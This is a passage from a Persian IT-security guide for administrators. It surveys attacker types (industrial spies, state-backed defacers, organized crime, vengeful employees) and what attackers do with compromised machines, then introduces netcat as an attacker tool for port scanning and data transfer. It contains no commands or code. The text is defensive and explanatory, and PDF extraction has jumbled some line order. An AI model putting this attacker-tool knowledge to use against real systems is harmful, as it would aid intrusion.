ﮔﺰﺍﺭﺷﻬﺎﻱ ﻏﻴﺮ ﺭﺳﻤﻲ ﻣﻲﮔﻮﻳﺪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﺴﻘﻠﻲﻫﺎﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺑﻪ ﺭﺍﻩ ﺭﺍﺳﺖ ﻫﺪﺍﻳﺖ ﻣﻲﺷﻮﻧﺪ .ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﻋﻼﻗﻪ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ ﺍﺯ
ﺩﺳﺖ ﻣﻲﺩﻫﻨﺪ ،ﺑﻌﻀﻲ ﻣﺘﺼﺪﻱ ﺳﻴﺴﺘﻢ ﻳﺎ ﺭﺍﻫﺒﺮ ﺷﺒﻜﻪ ﻣﻲﺷﻮﻧﺪ ،ﻭ ﺣﺘﻲ ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﺑﻪ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺑﺎﺯﻣﻲﮔﺮﺩﻧﺪ )ﺍﺳﺘﺨﺪﺍﻡ ﭼﻨﻴﻦ
ﺍﻓﺮﺍﺩﻱ ﺑﺮﺍﻱ ﻧﻈﺎﺭﺕ ﺑﺮ ﺷﺒﻜﻪ ،ﺩﺭ ﻣﺠﺎﻣﻊ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻫﻨﻮﺯ ﻣﻮﺿﻮﻋﻲ ﻣﻮﺭﺩ ﻣﻨﺎﻗﺸﻪ ﺍﺳـﺖ( ،ﻭﻟﻲ ﻧﺎﮔﻔﺘﻪ ﭘﻴﺪﺍﺳﺖ ﻛﻪ ﺑﺮﺧﻲ ﺍﺯ ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﺑـﻪ ﺯﻧـﺪﮔﻲ
ﺗﺒﻬﻜﺎﺭﺍﻧﺔ ﺧﻮﺩ ﺍﺩﺍﻣﻪ ﻣﻲﺩﻫﻨﺪ.
ﺟﺎﺳﻮﺳﻬﺎﻱ ﺻﻨﻌﺘﻲ
ﺑﻪ ﻧﻈﺮ ﻣﻲﺭﺳﺪ ﻛﻪ ﺑﺎﺯﺍﺭ ﺳﻴﺎﻩ ﺩﺭﺣﺎﻝ ﺭﺷﺪﻱ ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺳﺮﻗﺖﺷﺪﻩ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺑﻌﻀﻲ ﺍﻓﺮﺍﺩ ﻛﻮﺷﺶ ﻛﺮﺩﻩ-
ﻼ ﭘﻴﺸﻨﻬﺎﺩ ﺭﻓﻊ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﻳـﻚ ﺷـﺮﻛﺖ ﺩﺭ ﻗﺒـﺎﻝ ﺩﺭﻳﺎﻓـﺖ ﻣﺒـﺎﻟﻎ
ﺍﻧﺪ ﺍﺯ ﺻﺎﺣﺒﺎﻥ ﻗﺎﻧﻮﻧﻲ ﺍﻃﻼﻋﺎﺕ ﺑﺎﺟﮕﻴﺮﻱ ﻭ ﺍﺧﺎﺫﻱ ﻛﻨﻨﺪ .ﻣﺜ ﹰ
ﻫﻨﮕﻔﺖ ﺭﺍ ﺩﺍﺩﻩﺍﻧﺪ .ﭼﻨﺪﻳﻦ ﻣﻮﺭﺩ ﻣﺴﺘﻨﺪ )ﻭ ﺍﺣﺘﻤﺎ ﹰﻻ ﻣﻮﺍﺭﺩ ﻣﺘﻌﺪﺩ ﮔﺰﺍﺭﺵ ﻧﺸﺪﻩ( ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺍﺳـﺖ ﻛـﻪ ﺩﺭ ﺁﻧﻬـﺎ ﻣﺠﺮﻣـﺎﻥ ،ﺷـﻤﺎﺭﺓ ﻛﺎﺭﺗﻬـﺎﻱ
ﺍﻋﺘﺒﺎﺭﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺭﺍ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻳﻚ ﺷﺮﻛﺖ ﺩﺯﺩﻳﺪﻩ ﻭ ﺗﻬﺪﻳﺪ ﻛﺮﺩﻩﺍﻧﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻣﻨﺘﺸﺮ ﺧﻮﺍﻫﻨﺪ ﻛـﺮﺩ ﻣﮕـﺮ ﺍﻳﻨﻜـﻪ ﺷـﺮﻛﺖ
ﺑﻬﺎﻳﻲ ﺑﻪ ﺁﻧﻬﺎ ﺑﭙﺮﺩﺍﺯﺩ .ﻫﻤﭽﻨﻴﻦ ﮔﺰﺍﺭﺷﻬﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻣﺒﻨﻲ ﺑﺮ ﺍﻳﻨﻜﻪ ﻣﻬﺎﺟﻤﻴﻨﻲ ﺳﻌﻲ ﻛﺮﺩﻩﺍﻧﺪ ﺍﺳﺮﺍﺭ ﺻﻨﻌﺘﻲ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﻣﻮﺭﺩ ﻧﻔﻮﺫ
ﻗﺮﺍﺭ ﺩﺍﺩﻩﺍﻧﺪ ﺭﺍ ﺑﻪ ﺭﻗﺒﺎﻳﺸﺎﻥ ﺑﻔﺮﻭﺷﻨﺪ .ﺍﻳﻦ ﻣﻌﺎﻣﻼﺕ ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﻳﮕـﺮ -ﻭ ﺍﻟﺒﺘـﻪ ﻧـﻪ ﻫﻤـﻪ ﻛـﺸﻮﺭﻫﺎ -
ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺍﻋﻼﻡ ﺷﺪﻩ ﺍﺳﺖ.
ﺍﻳﺪﻩﭘﺮﺩﺍﺯﺍﻥ ﻭ ﻋﻮﺍﻣﻞ ﺣﻜﻮﻣﺘﻲ
ﻻ ﻧﻴـﺖ
ﻫﻤﻴﺸﻪ ﻭ ﺩﺭ ﻫﻤﺔ ﺟﻮﺍﻣﻊ ﺟﻤﻌﻴﺘﻲ ﺍﺯ "ﻣﺘﻔﻜﺮﺍﻥ ﻣﺨﺎﻟﻒ" ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺪﻻﻳﻞ ﻓﻜﺮﻱ ﻳﺎ ﺳﻴﺎﺳﻲ ﺑﻪ ﺳﺎﻳﺘﻬﺎ ﻧﻔﻮﺫ ﻣﻲﻛﻨﻨﺪ .ﻣﻌﻤـﻮ ﹰ
ﺍﻳﻦ ﺍﻓﺮﺍﺩ "ﺗﻐﻴﻴﺮ ﻇﺎﻫﺮ ﺻﻔﺤﺎﺕ ﻭﺏ" ﺑﺮﺍﻱ ﻧﻮﻋﻲ ﺍﻧﺘﺸﺎﺭ ﺑﻴﺎﻧﻴﻪ ﺍﺳﺖ .ﮔﺎﻫﻲ ﻣﺨﺎﻟﻔﻴﻦ ﻳﻚ ﺑﻴﺎﻧﻴﻪ ﺳﻴﺎﺳﻲ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨﺪ ،ﮔـﺎﻫﻲ ﻣﻤﻜـﻦ
ﺍﺳﺖ ﻳﻚ ﻣﺴﺌﻠﻪ ﻓﻜﺮﻱ ﺭﺍ ﺍﺑﺮﺍﺯ ﻛﻨﻨﺪ ،ﻳﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺻﺮﻓﹰﺎ ﺁﺷﻮﺏﻃﻠﺒﺎﻧﻲ ﺑﺎﺷﻨﺪ ﻛﻪ ﻋﻠﻴﻪ ﺻﻨﻌﺖ ﻳﺎ ﺑﺎﺯﺍﺭ ﺟﻨﺠﺎﻝ ﺑﻪ ﺭﺍﻩ ﻣﻲﺍﻧﺪﺍﺯﻧﺪ.
ﺍﻳﻦ ﻭﻗﺎﻳﻊ ﮔﺎﻫﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺧﻼﻑ ﻋﻼﻳﻖ ﻣﻠﻲ ﺍﻧﺠﺎﻡ ﺷﻮﺩ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﻣﻤﻜﻦ ﺍﺳﺖ ﻳﻚ ﺟﻨﺒﺶ ﭼﺮﻳﻜﻲ ﻇﺎﻫﺮ ﺳﺎﻳﺘﻬﺎﻱ ﻣﺘﻌﻠﻖ ﺑـﻪ
ﻳﻚ ﺩﺳﺘﻪ ﺍﺯ ﻣﺨﺎﻟﻔﺎﻥ ﺩﻭﻟﺘﻲ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﺪ .ﺩﺭ ﺳﺎﻳﺮ ﻣﻮﺍﺭﺩ ﺍﻓﺮﺍﺩﻱ ﻣﺸﺎﻫﺪﻩ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﺗﻼﺵ ﻣﻲﻛﻨﻨﺪ ﺑﺎ ﺣﻤﻠﻪ ﺑﻪ ﺳﺎﻳﺘﻬﺎ ﺩﺭ ﻳﻚ ﺣﻮﺯﺓ
ﺣﻜﻮﻣﺘﻲ ،ﻫﺪﻓﻲ ﺭﺍ ﺩﺭ ﻳﻚ ﺣﻮﺯﻩ ﺩﻳﮕﺮ ﺑﺮﺁﻭﺭﺩﻩ ﻛﻨﻨﺪ؛ ﻣﺎﻧﻨﺪ ﺩﺭﮔﻴﺮﻳﻬﺎﻱ ﺍﺳﺮﺍﺋﻴﻞ ﻭ ﻓﻠﺴﻄﻴﻦ ،ﺟﺪﺍﻝ ﻣﻴﺎﻥ ﻫﻨﺪ ﻭ ﭘﺎﻛﺴﺘﺎﻥ ،ﻭ ﭘـﺲ ﺍﺯ ﺁﻥ
ﺑﻤﺒﺎﺭﺍﻥ ﺳﻔﺎﺭﺕ ﭼﻴﻦ ﺗﻮﺳﻂ ﻧﻴﺮﻭﻫﺎﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﺗﻬﺎﺟﻤﺎﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺧﻮﺩﺟﻮﺵ ﺑﺎﺷﻨﺪ ،ﺑﻌﻀﻲ ﻫﻢ ﻣﻤﻜﻦ ﺍﺳـﺖ
ﺗﻮﺳﻂ ﺧﻮﺩ ﺣﻜﻮﻣﺘﻬﺎ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻭ ﺣﻤﺎﻳﺖ ﻣﺎﻟﻲ ﺷﻮﻧﺪ.
ﺍﻳﻦ ﻭﻗﺎﻳﻊ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺷﺨﺎﺹ ﺛﺎﻟﺚ ﺭﺍ ﻧﻴﺰ ﺗﺤﺖ ﺗﺄﺛﻴﺮ ﻗﺮﺍﺭ ﺩﻫﻨﺪ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺩﺭ ﺧﻼﻝ ﻳﻚ ﻧﻔﻮﺫ ﺩﺭ ﭼـﻴﻦ ،ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ISPﻫـﺎﻳﻲ ﻛـﻪ
ﺻﻔﺤﺎﺕ ﻭﺏ ﻫﻮﺍﺩﺍﺭﺍﻥ Falun Gongﺭﺍ ﺩﺭ ﺍﻃﺮﺍﻑ ﺟﻬﺎﻥ ﻣﻴﺰﺑﺎﻧﻲ ﻣﻲﻛﺮﺩﻧﺪ ﻣﺘﻮﺟﻪ ﺷﺪﻧﺪ ﻛﻪ ﺳـﺮﻭﻳﺲﺩﻫﻨﺪﮔﺎﻧـﺸﺎﻥ ﺗﺤـﺖ ﺗﻬـﺎﺟﻢ
ﺳﺎﻳﺘﻬﺎﻳﻲ ﺍﺯ ﺩﺍﺧﻞ ﭼﻴﻦ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ .ﺑﻪ ﺩﻟﻴﻞ ﻫﻤﺎﻫﻨﮕﻲ ﻭ ﺗﻌﺪﺩ ﺣﻤﻼﺕ ،ﻣﻘﺎﻣﺎﺕ ﻣﺴﺌﻮﻝ ﻣﻌﺘﻘﺪﻧﺪ ﻛﻪ ﺍﻳﻦ ﺣﻤـﻼﺕ ﺑـﺎ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺩﻭﻟـﺖ
ﺑﻮﺩﻩ ﺍﺳﺖ.
ﺟﺮﻡ ﺳﺎﺯﻣﺎﻥﻳﺎﻓﺘﻪ
ﺭﻭﺯﺍﻧﻪ ﻣﻘﺎﺩﻳﺮ ﻫﻨﮕﻔﺘﻲ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺍﺭﺯﺵ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺎﻟﻲ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭﺣﺎﻝ ﺗﺒﺎﺩﻝ ﺍﺳﺖ .ﺧﻮﺵﺑﺎﻭﺭﺍﻧﻪ ﺍﺳﺖ ﻛﻪ ﺗﺼﻮﺭ ﺷﻮﺩ ﻋﻨﺎﺻـﺮ
ﺗﺒﻬﻜﺎﺭ ﺍﺯ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺧﺒﺮ ﻧﺪﺍﺭﻧﺪ ،ﻳﺎ ﻋﻼﻗﻪﻣﻨﺪ ﻧﻴﺴﺘﻨﺪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺟﻬﺎﻥ ﺷـﺒﻜﻪﺷـﺪﻩ ﮔـﺴﺘﺮﺵ ﺩﻫﻨـﺪ .ﺣﻤﻠـﻪﻫـﺎﻳﻲ ﺍﺯ ﻗﺒﻴـﻞ
ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ،ﺩﺯﺩﻱ ﺍﻃﻼﻋﺎﺕ ،ﻭ ﭘﻮﻟﺸﻮﺋﻲ ﻛﻪ ﺑﺼﻮﺭﺕ onlineﻫﺪﺍﻳﺖ ﺷﺪﻩ ﺭﺥ ﺩﺍﺩﻩ ﺍﺳﺖ ﻛﻪ ﻣﻘﺎﻣـﺎﺕ ﻣـﺴﺌﻮﻝ ﻣﻌﺘﻘﺪﻧـﺪ ﻫﻤﮕـﻲ ﺩﺭ
ﺯﻣﺮﺓ ﺟﺮﺍﺋﻢ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ﻫﺴﺘﻨﺪ .ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﻭﻱ ﺷﺒﻜﻪ ﺑﺮﺍﻱ ﮔﺴﺘﺮﺵ ﻭ ﻫﻤﺎﻫﻨﮕﻲ ﺧﻮﺩﻓﺮﻭﺷﻲﻫﺎ ﻭ ﻓﺤـﺸﺎ ،ﻗﻤـﺎﺭ ،ﺳـﻮﺩﺍﮔﺮﻱ ﺑـﺎ ﻣـﻮﺍﺩ
ﻻ ﻣﺸﻤﻮﻝ ﺟﺮﺍﺋﻢ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ﻣﻲﺷﻮﺩ ،ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ .ﻋـﻼﻭﻩ
ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ،ﻫﺠﻮﻡ ﻣﺴﻠﺤﺎﻧﻪ ،ﻭ ﺳﺎﻳﺮ ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻲ ﻛﻪ ﻣﻌﻤﻮ ﹰ
ﺑﺮ ﺁﻥ ﺩﻭﺍﻳﺮ ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﻮﺳﻂ ﻣﺠﺮﻣﻴﻦ ﺑﺮﺍﻱ ﻛﺸﻒ ﺁﻧﭽﻪ ﺩﻭﻟﺖ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑﺎ ﺁﻧﻬﺎ ﻣﻲﺩﺍﻧـﺪ ﻳـﺎ ﻛـﺸﻒ ﻣﺸﺨـﺼﺎﺕ ﺧﺒـﺮ
ﺭﺳﺎﻧﺎﻥ ﻭ ﺷﻬﻮﺩ ،ﻣﻮﺭﺩ ﻫﺪﻑ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ.
٢٦٩
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﺑﺎ ﺟﻬﺎﻧﻲ ﺷﺪﻥ ﺷﺒﻜﻪ ،ﺗﻬﺪﻳﺪﺍﺕ ﮔﺴﺘﺮﺓ ﺑﻴﺸﺘﺮﻱ ﭘﻴﺪﺍ ﻛﺮﺩﻩﺍﻧﺪ .ﺍﻣﺮﻭﺯﻩ ﺩﻳﮕﺮ ﺑﺎﻧﺪ ﺩﺯﺩﺍﻥ ﺭﻭﺳﻲ ،ﻣﺎﻓﻴﺎﺋﻲﻫﺎﻱ ﺳﻴـﺴﻴﻞ ،ﻳـﺎﻛﻮﺯﺍﻱ ﮊﺍﭘـﻦ،
ﺗﺠﺎﺭ ﻣﻮﺍﺩ ﻣﺨﺪﺭ ﺩﺭ ﺁﻣﺮﻳﻜﺎﻱ ﺟﻨﻮﺑﻲ ،ﻭ ﮔﺮﻭﻩ ﺍﺭﺍﺫﻝ ﻭ ﺍﻭﺑﺎﺵ ﻟﺲ ﺁﻧﺠﻠﺲ ،ﻫﻤﻪ ﻭ ﻫﻤﻪ ﺭﻭﻱ ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﺗﻨﻬﺎ ﭼﻨﺪ ﻛﻠﻴـﻚ ﻣـﺎﻭﺱ ﺍﺯ
ﻣﺎ ﻓﺎﺻﻠﻪ ﺩﺍﺭﻧﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻘﺎﻣﺎﺕ ﺩﺍﻳﺮﻩ ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺍﺯ ﺍﻳﻨﻜﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺩﻫﻪ ﺁﻳﻨﺪﻩ ﻣﺤﻞ ﺭﺷﺪ ﺟﺮﺍﺋﻢ ﺍﺳﺖ ﻧﮕﺮﺍﻧﻨﺪ.
ﻛﺎﺭﻣﻨﺪﺍﻥ ﻛﻼﺵ
ﻭ ﺑﺎﻻﺧﺮﻩ ،ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺎﻣﻬﺎﺭﺕ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻡ ،ﻛﻴﻨﻪﺗﻮﺯﻱ ،ﻳﺎ ﺍﺫﻳﺖ ﻭ ﺁﺯﺍﺭ ،ﻋﻠﻴﻪ ﻛﺎﺭﻓﺮﻣﺎﻳﺎﻥ ﺧﻮﺩ ﺍﻗﺪﺍﻡ ﻛﺮﺩﻩﺍﻧـﺪ.
ﺩﺭ ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ ،ﻛﺎﺭﻛﻨﺎﻥ ﺍﺧﺮﺍﺝ ﺷﺪﻩ ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﻛﺎﺭﻓﺮﻣﺎﻳﺸﺎﻥ ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ ﺟﺎ ﺩﺍﺩﻩﺍﻧﺪ.
ﻣﻬﺎﺟﻤﺎﻥ ﺑﺪﻧﺒﺎﻝ ﭼﻪ ﭼﻴﺰﻱ ﻫﺴﺘﻨﺪ
ﻻ ﭘﺎﻳﺎﻥ ﻛﺎﺭ ﻳﻚ ﻧﻔﻮﺫﮔﺮ ﻧﻴﺴﺖ ،ﺑﻠﮑﻪ ﺍﻏﻠﺐ ﻣﻬﺎﺟﻤﻴﻦ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺗﺤﺖ
ﺻﺮﻑ ﺑﺪﺳﺖ ﮔﺮﻓﺘﻦ ﻛﻨﺘﺮﻝ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﻌﻤﻮ ﹰ
ﻓﺮﻣﺎﻥ ﺧﻮﺩ ﺩﺭ ﺁﻭﺭﺩﻩﺍﻧﺪ ﺑﻌﻨﻮﺍﻥ ﮔﺎﻡ ﻧﺨﺴﺖ ﺣﻤﻼﺕ ﻭ ﺧﺮﺍﺑﻜﺎﺭﻱﻫﺎﻱ ﺑﻌﺪﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ .ﭘﺲ ﺍﺯ ﺁﻧﻜﻪ ﻣﻬﺎﺟﻢ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﺍ ﺗﺤﺖ
ﻓﺮﻣﺎﻥ ﺧﻮﺩ ﺩﺭ ﻣﻲﺁﻭﺭﺩ ،ﺳﻴﺴﺘﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﺷﺮﺍﺭﺕﺑﺎﺭ ﻣﺨﺘﻠﻔﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ .ﺍﺯ ﺁﻥ ﺟﻤﻠﻪﺍﻧﺪ:
•
•
•
•
•
ﺷﺮﻭﻉ ﻛﺎﻭﺷﻬﺎ ﻳﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩﻫﺎ ﻋﻠﻴﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻳﮕﺮ؛
ﺷﺮﻛﺖ ﺩﺍﺩﻥ ﺳﻴﺴﺘﻢ ﺩﺭ ﺣﻤﻼﺕ ﺗﻮﺯﻳﻊﺷﺪﻩ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ؛
٣٩
ﻼ ﻣﻬﺎﺟﻢ ﻣﻤﻜﻦ ﺍﺳﺖ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﭘﻴﺎﻡ ﺍﺭﺗﺒﺎﻁ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﻨﺪ ﻛﻪ ﺑﻌﻨﻮﺍﻥ ﻭﻋﺪﻩﮔﺎﻫﻲ ﺑﺮﺍﻱ
ﺍﺟﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻣﺨﻔﻲ )ﻣﺜ ﹰ
ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ ﻭ ﻭﻳﺮﻭﺳﻬﺎﻳﻲ ﻛﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺩﺳﺘﺒﺮﺩ ﺯﺩﻩ ﺷﺪﻩ ﺭﺍ ﭘﺲ ﻣﻲﻓﺮﺳﺘﻨﺪ ﻋﻤﻞ ﻛﻨﺪ(؛
ﻛﻨﺘﺮﻝ ﻣﺨﻔﻴﺎﻧﺔ ﺷﺒﻜﺔ ﺳﺎﺯﻣﺎﻧﻲ ﻛﻪ ﻣﺎﻟﻚ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻪ ﺗﺴﺨﻴﺮ ﺩﺭﺁﻣﺪﻩ ﺍﺳﺖ ،ﺑﺎ ﻫﺪﻑ ﺑﻪ ﺗﺴﺨﻴﺮ ﺩﺭﺁﻭﺭﺩﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻴﺸﺘﺮ؛ ﻭ
ﺗﺒﺪﻳﻞ ﮐﺮﺩﻥ ﺁﻥ ﺑﻪ ﺍﻧﺒﺎﺭﻩﺍﻱ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺗﻬﺎﺟﻢ ،ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺴﺮﻭﻗﻪ ،ﻓﺤﺸﺎ ،ﻳﺎ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮ ﺍﻃﻼﻋﺎﺕ ﻗﺎﭼﺎﻕ.
ﺍﺑﺰﺍﺭﻫﺎﻱ ﺗﺠﺎﺭﺕ ﻣﻬﺎﺟﻤﻴﻦ
ﻻ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻤﻴﻦ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ:
ﮔﻮﺷﻪﺍﻱ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﻣﻌﻤﻮ ﹰ
(a.k.a netcat) nc
٤١
netcatﻛﻪ ﺩﺭ ﺍﺑﺘﺪﺍ ﺗﻮﺳﻂ ﻫﻮﺑﻴﺖ ﻧﻮﺷﺘﻪ ﺷﺪ ،ﭼﺎﻗﻮﻱ ﺍﺭﺗﺶ ﺳﻮﺋﻴﺲ ﺑﺮﺍﻱ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺘﺒﻨﻲ ﺑﺮ IPﺍﺳـﺖ .ﺑﻨـﺎﺑﺮﺍﻳﻦ netcatﻳـﻚ
ﺍﺑﺰﺍﺭ ﺑﺎ ﺍﺭﺯﺵ ﺭﺍﻫﺒﺮﻱ ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﻔﻴﺪ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻤﻴﻦ ﻣﻲﺑﺎﺷﺪ .ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ netcatﺑﺮﺍﻱ ﺍﺭﺳﺎﻝ ﺩﺍﺩﺓ ﺩﻟﺨﻮﺍﻩ ﺑـﻪ ﭘﻮﺭﺗﻬـﺎﻱ ﺩﻟﺨـﻮﺍﻩ
TCP/IPﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺭﺍﻩ ﺩﻭﺭ ﺑﺮﺍﻱ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻣﺤﻠﻲ ،TCP/IPﻭ ﺑﺮﺍﻱ ﺍﺟﺮﺍﻱ ﭘﻮﻳﺸﻬﺎﻱ ﻣﻘﺪﻣﺎﺗﻲ ﭘﻮﺭﺕ ٤٢ﺍﺳﺘﻔﺎﺩﻩ
ﻛﻨﻴﺪ.
Internet Relay Chat Server
Backbone Router
Hobbit
Basic Portscan
39
40
41
42
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻪ ﺗﺴﺨﻴﺮ ﺩﺭﺁﻣﺪﻩ ﺗﺒﺪﻳﻞ ﺑﻪ ﺑﺴﺘﺮﻫﺎﻱ ﻋﺎﻟﻲ ﺑﺮﺍﻱ ﺍﻳﻨﮕﻮﻧﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺷﻮﺩ ﺩﻻﻳﻞ ﺯﻳﺎﺩﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ.
ﺍﮔﺮ ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﻪ ﺗﺴﺨﻴﺮ ﺩﺭﺁﻣﺪﻩ ﺑﺎ ﺳﺮﻋﺖ ﺑﺎﻻ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻭﺻﻞ ﺑﺎﺷﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺘﻮﺍﻧﺪ ﺧﺮﺍﺑﻲ ﻭ ﺍﺧﺘﻼﻝ ﺑﻴﺸﺘﺮﻱ ﻧﺴﺒﺖ ﺑـﻪ ﺳـﺎﻳﺮ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺤﺖ ﻛﻨﺘﺮﻝ ﻣﻬﺎﺟﻢ ﺑﺎﻋﺚ ﺷﻮﺩ .ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻪ ﺗﺴﺨﻴﺮ ﺩﺭﺁﻣﺪﻩ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺩﺷﻮﺍﺭﺗﺮ ﻛﺮﺩﻥ ﻛـﺎﺭ ﻣـﺴﺌﻮﻟﻴﻦ ﺩﺭ
